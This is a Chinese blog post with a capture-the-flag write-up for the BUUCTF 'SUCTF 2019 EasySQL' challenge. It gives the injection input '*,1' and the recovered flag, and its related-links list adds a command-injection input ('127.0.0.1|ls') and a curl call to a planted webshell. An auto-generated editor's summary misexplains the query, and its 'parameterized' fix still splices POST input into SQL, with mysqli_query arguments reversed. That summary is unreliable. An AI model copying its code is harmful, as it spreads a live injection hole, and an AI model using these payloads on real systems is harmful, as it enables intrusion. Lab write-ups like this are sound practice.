[BUUCTF][Web][SUCTF 2019]EasySQL 1

buuctf,web,suctf,easysql · 浏览次数 : 34

小编点评

**问题:** ```sql select $_POST['query'] || flag from Flag; ``` **解析:** 这段代码使用 `OR` 运算符将 `$_POST['query']` 和 `flag` 拼接在一起。 * `$_POST['query']` 是用户在表单中输入的文本。 * `flag` 是一个包含 SQL 查询语句的字符串。 当 `flag` 为 `*` 时,`select $_POST['query'] || flag` 将返回所有匹配 `Flag` 表中的字段。然而,`flag` 中包含的字符串 `'*'` 在 SQL 中表示所有字段。因此,这段代码将返回所有字段的值,这可能会导致 SQL 注入。 **解决方案:** 为了避免 SQL 注入,需要使用参数化 SQL 语句。参数化 SQL 语句通过将查询参数绑定到 SQL 语句中来防止 SQL 注入。 **代码示例:** ```php $query = $_POST['query']; $flag = '*'; $sql = "select $query || '$flag' from Flag"; // 执行 SQL 语句 $result = mysqli_query($sql, $conn); ``` **注意:** * 这段代码仅提供解决方案,需要根据实际情况进行修改。 * SQL 注入攻击是一种危险的攻击,应该被严禁。

正文

这一题有点蛋疼,比较难顶
看了别人的write up 也很难get到解题思路,感觉必须要拿到源码进行审计才能解
大佬们猜后端是这么写的
select $_POST['query'] || flag from Flag;

这里使用来拼接字段名称

那么输入*,1, 用1 || flag得到1,这样拼接出来sql是:
select *,1 from Flag;

得到flag

Array ( [0] => flag{26d6bc25-ce81-4a4c-b24b-8ba243efad8e} [1] => 1 )

与[BUUCTF][Web][SUCTF 2019]EasySQL 1相似的内容:

[BUUCTF][Web][SUCTF 2019]EasySQL 1

这一题有点蛋疼,比较难顶 看了别人的write up 也很难get到解题思路,感觉必须要拿到源码进行审计才能解 大佬们猜后端是这么写的 select $_POST['query'] || flag from Flag; 这里使用或来拼接字段名称 那么输入*,1, 用1 || flag得到1,这样拼接

[BUUCTF][Web][极客大挑战 2019]EasySQL 1

打开靶机对应的url 界面显示需要输入账号和密码 分别在两个输入框尝试加单引号尝试是否有sql注入的可能,比如 123' 发现两个框可以注入,因为报了个错误信息 You have an error in your SQL syntax; check the manual that correspon

[BUUCTF][Web][HCTF 2018]WarmUp 1

这题已经标识为php 代码审计题,那么需要搞到源码才行 打开靶机对应的url,展示的是一张笑脸图片 右键查看网页源代码

[BUUCTF][Web][极客大挑战 2019]Havefun 1

打开靶机的URL,看到一个页面 右键查看源代码,看到有用信息 ...

[BUUCTF][Web][ACTF2020 新生赛]Include 1

打开靶机对应的url 显示一个tips 超链接 点击访问超链接,对应Url为 http://469398f2-5677-4270-a4a4-55c5e4a7504a.node4.buuoj.cn:81/?file=flag.php 显示信息Can you find out the flag, 右键查

[BUUCTF][Web][ACTF2020 新生赛]Exec 1

打开靶机对应url 显示可以输出ip 来进行ping操作 尝试试一下是否有命令注入的可能 127.0.0.1|ls 果然可以,输出结果 index.php PING 127.0.0.1 (127.0.0.1): 56 data bytes 按照套路估计是在根目录,试一下 127.0.0.1|ls /

[BUUCTF][Web][GXYCTF2019]Ping Ping Ping 1

打开靶机对应URL 提示有ip参数 尝试构造url http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1 显示 /?ip= PING 127.0.0.1 (127.0.0.1): 56 data byt

[BUUCTF][Web][极客大挑战 2019]Secret File 1

打开靶机对应的url 右键查看网页源代码,查看到一个访问路径 /Archive_room.php 构造url访问一下 http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/Archive_room.php 右键再次查看源代码,有一

[BUUCTF][Web][极客大挑战 2019]LoveSQL 1

打开靶机url,页面显示有两个输入框,框中输入123',发现两个框都有sql注入问题 爆出一下错误 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server versi

[BUUCTF][WEB][极客大挑战 2019]Knife 1

这题几乎是送分 题目不断暗示,后台存在一句话木马 拿个蚁剑连上去就完事了 这里用curl 连上去,演示一下,理解一下其中的原理 #注意 phpinfo() 后面的分号不能省 curl -d "Syc=phpinfo();" http://32a31ff6-2815-4485-a74e-e646f67